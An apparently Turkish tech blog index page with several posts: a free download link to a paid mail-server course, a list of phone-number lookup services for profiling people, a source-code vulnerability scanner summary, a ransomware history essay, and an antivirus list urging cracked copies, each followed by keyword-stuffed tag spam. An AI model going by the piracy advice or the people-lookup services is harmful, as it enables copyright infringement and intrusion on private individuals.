🔻 E-posta İstemcisini Kullanarak Nasıl Bağlanacağınızı ve Programlı Olarak Nasıl E-posta
Göndereceğinizi Öğrenin 🔻 İstenmeyen Postalardan Kaçınmak için rDNS, DMARC, DKIM ve SPF’yi yapılandırın.
🔻 Webmin’i Posta Sunucusu Olarak Kullanmayı Öğrenin.
🔻 Kendi Posta Sunucunuz Üzerinden WordPress Web Sitenizden E-posta Gönderin
🔻 Ve Daha Fazlası +20

Kaynak Bağlantısı (Ücretli):-
https://www.udemy.com/course/build-mail-server-with-linux-ubuntu-aws/

İndirme Bağlantısı (Ücretsiz) :-
https://mega.nz/folder/T8swlZRA#w7Bj_NcBhoiTGuzFqDq8vg

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, arızalı, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, Ciceksepeti, cuma mesajları, cumhuriyet, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, gratis, haber7, haberler, habertürk, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, pankek tarifi, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, sivasspor, tüvtürk, Trabzonspor, Trendyol, twitch, twitter, yandex, yapı kredi, yotube, youtube, ziraat bankası Yorum yapın

Telefon numarasını sorgulama (Phone Osint)

Yalnızca cep telefonu numarasına sahip bir kullanıcı hakkında oldukça yeterli miktarda bilgi bulmamıza izin veren ilginç bir hizmet seçkisini paylaşacağız.

🔘 Lampyre – hesap ve telefon rehberi aramasının web versiyonu.
🔘 Getcontact – numaranın rehberde nasıl yazıldığı hakkında bilgi arayın.
🔘 Avinfo Guru – Araç sahibini telefonla kırıyoruz.
🔘 Veri bulutu – iyi bilinen “Tanrı’nın Gözü” botu;
🔘 Telefon Durdurma listesi – tüm kaynaklarda bir numara arayın.
🔘 Rosfirm – tam ad, kayıt, adres arayın. Ama şehri bilmen gerekiyor.

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, arızalı, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, Ciceksepeti, cuma mesajları, cumhuriyet, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, gratis, haber7, haberler, habertürk, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, pankek tarifi, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, sivasspor, tüvtürk, Trabzonspor, Trendyol, twitch, twitter, yandex, yapı kredi, yotube, youtube, ziraat bankası Yorum yapın

SCodeScanner – Kullanıcının Kritik Güvenlik Açıklarını Bulmak İçin Kaynak Kodu Tarayabileceği Kaynak Kod Tarayıcı anlamına gelir

KitPloit – önde gelen Güvenlik Araçları, Hacking Araçları, Siber Güvenlik ve Ağ Güvenliği kaynağı ☣

SCodeScanner , kullanıcının Kritik Güvenlik Açıklarını bulmak için kaynak kodunu tarayabileceği Kaynak Kodu tarayıcı anlamına gelir. Bu tarayıcının temel amacı, kod Prod’da yayınlanmadan önce kaynak kodun içindeki güvenlik açıklarını bulmaktır.

Özellikler

  1. Desteklenen PHP Dili
  2. Desteklenen YAML Dili
  3. Sonuçları, Jira ayrıca Slack gibi hata izleme hizmetlerine iletin (Aynı anda birden fazla kişiye gruplamak için dosya gönderme).
  4. Başka herhangi bir programda kolayca kullanılabilen JSON formatında sonuçlar verir.
  5. Kurallarla çalışır. Sadece hedef kuralın php/yaml dizininde bulunmadığı bazı kurallar oluşturmamız gerekiyor.
  6. Gelişmiş kalıpları tarayabilen kurallar

Başarılar

SCodeScanner, birden çok CMS eklentisindeki güvenlik açıklarını bulmak için 5 CVE aldı.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

Nasıl çalıştırılır?

  • Depoyu indirin –
  • Koşmakpip3 install -r requirements.txt
  • Ve koşpython3 scscanner.py --help 
1 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, arızalı, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, Ciceksepeti, cuma mesajları, cumhuriyet, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, gratis, haber7, haberler, habertürk, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, pankek tarifi, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, sivasspor, tüvtürk, Trabzonspor, Trendyol, twitch, twitter, yandex, yapı kredi, yotube, youtube, ziraat bankası Yorum yapın

Fidye yazılımının gelişimi

Bu hafta , Uluslararası Polis Birliği’nin İrlanda Bölümü tarafından üç ayda bir yayınlanan (çevrimiçi ve fiziksel bir kopya olarak çıkan) IPA Dergisi’nin 50. sayısında yayınlanan makalemi sunuyorum.

İşte geliyor:

Fidye yazılımlarının tarihi ve evrimi: kuponlardan kripto para birimine

Son birkaç aydaki haber yayınlarını veya sosyal medya gönderilerini takip ettiyseniz, muhtemelen bu duruma karşı şimdiye kadar gerçekleştirilen en ciddi siber saldırının ne olduğuyla ilgili ana haberi kaçırmış olamazsınız – Conti fidye yazılımı enfeksiyonu SEÇ bilgisayar ağlarının son mayıs ayı.

Aynı zamanda, bu yıl Avrupa’da şimdiye kadarki en büyük siber güvenlikle ilgili haberlerden biriydi ve çok sayıda ulusal ve uluslararası tartışmaya yol açtı. Burada, bu tartışmaların bazıları devletin siber suçlulara ödeme yapıp yapmaması gerektiğine odaklandı. Bu siber saldırı, İrlanda’nın siber savunma yeteneklerinin yeterliliğine de keskin bir şekilde odaklandı.

Fidye yazılımı konusu bazı insanlar için yeniydi, ancak BT sistemlerine yönelik bu saldırı vektörü artık onlarca yıllık. Peki – fidye yazılımı tam olarak nedir ve nasıl ortaya çıktı?

fidye yazılımı OSINT

Fidye Yazılımının Tanımı

Fidye yazılımı (veya “fidye yazılımı”), bir sabit sürücüdeki dosyalara sahte bir şifreleme algoritması uygulamak üzere tasarlanmış bir bilgisayar programıdır ve şifre çözme anahtarı karşılığında bir fidye ödenmediği sürece bu dosyalara yasal sahiplerinin erişmesini imkansız hale getirir.

Belgelenen ilk fidye yazılımı saldırısı vakası, İnternet modern şeklini almaya başlamadan yıllar önce gerçekleşti. 1989’da Dünya Sağlık Örgütü’nün AIDS konferansına katılanlara kötü niyetli bir program içeren disketler (şimdilerde kim hatırlıyor!) dağıtıldı.

Daha sonra AIDS truva atı olarak anılacak olan bu program, kendisini sabit sürücüye kopyaladı, bir süre hareketsiz kaldı ve ardından beklenmedik bir şekilde C sürücüsü sistem dosyalarını kilitledi. Bunların kilidini açmak için Panama’daki bir posta kutusuna 189 dolar göndermek gerekiyordu.

Bu saldırının arkasındaki kişinin Harvard eğitimli bir biyolog olduğu ortaya çıktı ve bu kişinin amacı belirsizdi – kimliği tespit edilip tutuklandı, ancak daha sonra zihinsel olarak yargılanmaya uygun olmadığı açıklandı.

Yeniliğine rağmen, AIDS truva atı, oldukça basit şifreleme kullanan temel yazılım olarak kabul edildi ve sonunda kırılarak, etkilenen dosyaların gaspçıya ödeme yapmadan kilidini açmayı mümkün kıldı.

GELİŞEN TEHDİT

Sonraki yıllarda, İnternet’in yaygınlaşmasıyla birlikte fidye yazılımları, ağ protokollerini kullanan bilgisayarlar arasında çoğalabilecek şekilde gelişti – artık disket veya fiziksel ortam dağıtmaya gerek kalmadı. Yine de “truva atı” özelliğini korudu – efsanevi Truva atı gibi, fidye yazılımı da iyi huylu, hatta yararlı, meşru yazılım gibi görünecekti.

2005 yılında, Liberty Reserve, erken e-ticaret platformu aracılığıyla fidye talep eden bir metin dosyasıyla birlikte daha karmaşık bir şifreleme kullanan bir truva atı olan Liberty Reserve ilk kurbanlarını vurdu. Bir yıl sonra, alışılmadık bir fidye ödeme sistemiyle Archiveus truva atı geldi – çevrimiçi bir eczaneden satın alma yoluyla.

Ardından, kullanıcının ekranını kötü niyetli bir açılır pencereyle kilitleyen ve Ukash kartları, PayPal mevduatları ve hatta Amazon kuponları aracılığıyla ödeme talep eden, bazıları diğerlerinden daha ilkel olan başka fidye yazılımı biçimleri geldi.

Bazı araştırmacılar bu tür yazılımları “korkutucu yazılım” olarak sınıflandırır – bazı durumlarda sistemi güvenli modda başlatarak veya herhangi bir veri kaybı olmadan geri yükleyerek kilitleme mekanizmasını atlamak nispeten kolaydı.

İrlandalı kullanıcılar, yasadışı içeriğe erişim için onları “para cezası” ödemeye korkutmaya çalışan “Garda Ukash virüsü” şeklinde bu saldırılardan paylarına düşeni aldılar.

Yukarıdaki tüm çalışma modları, fidye yazılımı operatörleri için kritik bir sorunu vurguladı: Suçlu davalarına sempati duymayan üçüncü taraf hizmetleri aracılığıyla ödemeleri şantaj ve işleme koyma yeteneğinin sınırlı olması. Bu, Bitcoin ve diğer kripto para birimlerinin artan popülaritesi ile yakında değişecekti.

Ukash Garda virüs korkutma yazılımı
2012 vintage korkuluk açılır ekranı örneği

YENİ ON YIL, YENİ TRENDLER

2011 ve 2012 yılları arasında, siber suçluların ve onların gaspçı yazılımlarının, internetin merkezi olmayan, sansüre dirençli bir dijital para birimi olan Bitcoin’e daha fazla güvendiğini gören gözlemlenebilir bir eğilim oluşmaya başladı. Bitcoin, sahibinin, herhangi bir aracıya ihtiyaç duymadan diğer kullanıcılarla özgürce işlem yapabilen kendi mali koruyucusu olmasına izin verir (her ne kadar Bitcoin’i fiat para birimiyle takas etmek hala bir üçüncü taraf hizmeti gerektirir).

Fidye yazılımı operatörleri ayrıca teknik oyunlarını da geliştirdiler – örneğin, 2013’te ağlara toplu saldırılara başlayan kötü şöhretli CryptoLocker veya TeslaCrypt, spam yaymak için kullanılabilecek binlerce kötü amaçlı yazılım bulaşmış bilgisayardan oluşan bir ağ olan devasa ‘botnet’lere dayanıyordu. veya kötü amaçlı yazılımların yanı sıra dünyanın herhangi bir yerindeki çevrimiçi sistemlere hizmet reddi saldırıları gerçekleştirin. Botnet’ler, fidye yazılımı operatörlerinin, kötü amaçlı yazılımlarını çoğaltmak için kullanılan yüz binlerce kötü amaçlı e-posta ve bağlantı gönderdikleri devasa organize kampanyalar yürütmesine izin verdi.

Botnet’lerin ortaya çıkması ve uygun şekilde organize edilmiş ve sürdürülen bir saldırı altyapısı, fidye yazılımı geliştiricileri için “hizmet olarak fidye yazılımı” (RaaS) çalışma biçiminin geliştirilmesine yol açtı. Bu yarı iş modeli, küresel büyük teknoloji kuruluşlarının sunduğu hizmetleri bir şekilde yansıtıyor – 50 – 100 $ arasında bir aylık abonelik ücreti karşılığında, teknik olarak daha az karmaşık bir siber suçlu, özel eğitim materyallerine erişimle birlikte kullanıma hazır bir fidye yazılımı seti satın alabilir. , kiralık çevrimiçi forumlar veya botnet’ler.

KÜRESEL BİR SORUN

Fidye yazılımları için bir diğer önemli kilometre taşı, 2017’nin başlarında gerçekleşen ilk küresel fidye yazılımı salgını olan WannaCry’dı. WannaCry, tüm dünyadaki eski ve yama uygulanmamış Windows sistemlerini hedef alarak, bireysel kullanıcılardan kurumlara ve hatta geleneksel altyapıların parçalarına saldırdı. trafik ışıkları sistemleri, klima kontrolörleri veya hastane ve bakım ekipmanları.

WannaCry ile fidye yazılımının önceki yinelemeleri arasındaki en büyük fark, savunmasız sistemleri otomatik olarak arama ve kendini onlara kopyalama yeteneğiydi. Saldırının kendisi sadece birkaç gün sürdü, ancak korkunç sonuçları oldu – dünya çapında birkaç yüz bin bilgisayar sistemine virüs bulaştı ve bunların çoğu resmi olarak rapor edilmedi. WannaCry’den bu yana fidye yazılımı küresel bir tehdit olmaya devam etti, ancak bir kez daha çalışma şeklini değiştirecekti.

Mevcut fidye yazılımı kampanyaları, siber suçluların kazançlı olarak tanımladığı ve fidyeyi ödeme olasılığı yüksek olan şirketlere ve büyük kurumlara yöneliktir. Conti, REvil, Maze, Lockbit ve diğer birkaç hain aktör, siber güvenlik araştırma şirketi Crowdstrike’ın “büyük oyun avcılığı” olarak tanımladığı şeye katılıyor.

Hizmet kesintileri ve itibar kaybı açısından kaybedecek çok şeyi olan hedeflerin peşinden giderler, bu nedenle yalnızca bir şifre çözme anahtarı elde etmek için değil, aynı zamanda verilerinin kamuya sızmasını önlemek için de ödeme yapabilirler. Bu taktiğe çifte gasp denir – fidye ödemesi sadece verilerin kilidini açmak için değil, aynı zamanda sızdırmamak için de talep edilir.

Fidyeyi ödeyen şirketler, özellikle GDPR’ye uymama nedeniyle potansiyel olarak önemli para cezaları ışığında, genellikle kayıplarını hesaplar ve daha az kötü olanı seçer.

Conti fidye yazılımı notu
Conti fidye yazılımı “kurtarma hizmeti” sitesinden ekran görüntüsü

SİBER TERÖRİZM OLARAK Fidye Yazılımı

Fidye yazılımı saldırılarının, özellikle büyük kesintilere ve insan yaşamının kaybına yol açması durumunda, yakında terör eylemleriyle aynı şekilde ele alınabileceğini gösteren birçok işaret var.

Sadece bu yıl, dünyanın her yerindeki hastanelere ve tıbbi tesislere yönelik fidye yazılımı saldırıları nedeniyle ölen birkaç tıbbi hasta vakası vardı.

HSE saldırısı, yakıt dağıtımında büyük gecikmelere neden olan ABD Koloni Boru Hattı’na yapılan felç edici saldırı ile aynı şekilde kolayca bir siber terör eylemi olarak kabul edilebilir. Bir siber saldırı sonucunda devlet hizmetleri veya kritik altyapı işlevini yerine getiremediğinde, artık düzenli, kâr amaçlı suç faaliyetlerinden bahsetmiyoruz.

Kesin olan bir şey var – işler ne yazık ki iyileşmeden önce daha da kötüleşecek. Fidye yazılımı çeteleri, parya Devletler tarafından barındırıldıkları ve onlara karşı koordineli, küresel bir tepki olmadığı sürece faaliyet göstermeye devam edecek.

1 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, arızalı, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, Ciceksepeti, cuma mesajları, cumhuriyet, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, gratis, haber7, haberler, habertürk, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, pankek tarifi, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, sivasspor, tüvtürk, Trabzonspor, Trendyol, twitch, twitter, yandex, yapı kredi, yotube, youtube, ziraat bankası Yorum yapın

En iyi virüs programları

1.MALWAREBYTES

bilgisayarinizdaki obur anti-spyware yazılımlarının bulamayacağı onlarca spyware ı bulan, ve eger bilgisayarinizda ciddi bir sorun varsa indirip full system scan yaptiginizda buyuk ihtimalle bu sorunu giderecek program. indirirken “2.6 megabyte programin bana ne yardımı olabilir ki?” gibi düşüncelre kapılmayın, boyundan büyük işlere kalkışır.Ayrıca ransomware virüssü içinde işe yarayan bir programdır. 

NOT: PROGRAM ÜCRETLİDİR LAKİN CRACK İLE FULL YAPABİLİRSİNİZ

2.WEBROOT

ne zaman ihtiyacım olsa her zaman dermanım olmuş programdır. hafiftir, kasmaz, gereğini yapması için bir işaretin yeter.  !TEK TIK!

NOT:PROGRAM ÜCRETLİDİR LAKİN CRACK İLE FL YAPABİLİRSİNİZ VEYA İNTERNETTEN ARAŞTIRARAK ÜRÜN ANAHTARIDA BULABİLİRSİNİZ ÇOK NADİR ÇIKAR ŞANS İŞİDİR ASLINDA.

3.KASPERSKY İNTERNET SECURİTY FREE

sağ taraftaki banner’i hiçbir ayar gerektirmeden kaldıran ve bana her sayfa yenilemesinde no kitty yaptırmaktan kurtaran kalitesini yıllarca devam ettirmiş, aldığı parayı sonuna kadar hakeden en iyi güvenlik yazılımı. şu an için trial versiyonunu kullansamda zamanı gelince  parayı basıp tereddütsüz pro versiyonunu  alacağım yazılımdır.

4.REİMAGE

Eğer sisteminiz için olağanüstü bir çözüm arıyorsanız size mutlaka Reimage Repair programına şans vermenizi öneririm. Programın en iyi anti-virüs programları listesinde buluma sebebi  bilgisayarınızı kötü amaçlı yazılımlardan koruyor olması değil, aynı zamanda bu virüslerin etkilediği en hasar görmüş alanları bile tamir edebiliyor olması.

5.AVG ANTİVÜRUS FREE

AVG Technologies, virüsten koruma endüstrisindeki en büyük isimlerden biridir ve bu yazılımı çok seviyoruz çünkü hiçbir şey yapmanıza gerek kalmadan arka planda sürekli işini görüyor.Ayrıca ransomware virüsleri içinde işe yarayan bir uygulamadır.

6.HITMAN PRO

hıtman pro antivürüs programı ransomware virüsleri için önerilen bir antivürüs programıdır.program ücretlidir lakin 30 günlük bir deneme sürümü hakkına sahibiz.birden fazla antispyware uygulamasını bir arada çalıştıran bir programdır.paranoyaklar için birebir olan bu programın kişisel bilgisayarınızda bulunmasını tavsiye ederim.

NOT:arkadaşlar bu bloğumda programların ücretli-ücretsiz herhangi bir linkini paylaşmıyorum çünkü anti vürüslerle ilgili bir blog olduğu için yanlış bir site seçerek sizlerin bigisayarına zararım olmasını istemiyor sizler kendi bildiğiniz güvendiğiniz sitelerden beğendiğiniz programları indirebilirsiniz.

Benim sizlere tavsiyem kesinlikle MALWAREBYTES programına kişisel bilgisayarında yer vermenizdir çünki gerçekten çok etkili bir programdır sürekli olarak bilgisayarınızda aktif bir şekilde bulunur bilgisayarınızı başlattığınızda otamatik olarak taramaya başlar ve çevrim içi olduğunuz sürece internetten gelen zararlı yazılım veya siteleri engeller.yani anlıycağınız çok iyi bir güvenlik duvarına sahiptir.

1 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, arızalı, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, Ciceksepeti, cuma mesajları, cumhuriyet, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, gratis, haber7, haberler, habertürk, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, pankek tarifi, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, sivasspor, tüvtürk, Trabzonspor, Trendyol, twitch, twitter, yandex, yapı kredi, yotube, youtube, ziraat bankası Yorum yapın

Yazı dolaşımı

←
→
WordPress.com'da bir web sitesi veya blog oluşturun Tema: WordPress.com tarafından Quadra.
Cybersecurity Plus+ | Türkiye'nin en büyük teknoloji blogu
WordPress.com'da bir web sitesi veya blog oluşturun
  • Abone Ol Abone olunmuş
    • Cybersecurity Plus+ | Türkiye'nin en büyük teknoloji blogu
    • WordPress.com hesabınız var mı? Şimdi oturum açın.
    • Cybersecurity Plus+ | Türkiye'nin en büyük teknoloji blogu
    • Abone Ol Abone olunmuş
    • Kaydolun
    • Giriş
    • Bu içeriği rapor et
    • Siteyi Okuyucu'da görüntüle
    • Abonelikleri Yönet
    • Bu şeridi gizle
 

Yorumlar Yükleniyor...
 

Yorum yazabilmek için oturum açmalısınız.

    WordPress.com ile böyle bir site tasarlayın
    Başlayın